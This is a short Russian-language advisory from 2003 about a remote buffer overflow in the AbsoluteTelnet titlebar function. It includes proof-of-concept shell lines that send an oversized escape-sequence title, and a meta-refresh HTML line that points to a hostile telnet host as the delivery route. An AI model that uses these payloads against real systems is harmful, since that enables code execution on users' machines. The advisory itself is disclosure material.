Удаленное переполнение буфера в AbsoluteTelnet

Дата публикации:
10.02.2003
Всего просмотров:
853
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Переполнение буфера обнаружено в AbsoluteTelnet. Удаленный атакующий может выполнить произвольный код с пользовательскими привилегиями.

Переполнение обнаружено в функции titlebar. Пример:

export KNUD=`perl -e 'print "A" x 174'`
echo -ne "\033]0;$KNUD\007"

export KNUD=`perl -e 'print "A" x 296'`
echo -ne "\033]0;$KNUD\007"
<pre>
Если AbsoluteTelnet клиент конфигурирован как telnet клиент по умолчанию, то уязвимость может использоваться через специально сформированную Web страницу. Пример: 
<pre>
<META HTTP-EQUIV="Refresh" CONTENT="0;URL=telnet://hostile.serv.er">
Уязвимость обнаружена в AbsoluteTelnet 2.00, 2.11 и устранена в 2.12 RC10

Ссылки: AbsoluteTelnet 2.00 buffer overflow.
или введите имя

CAPTCHA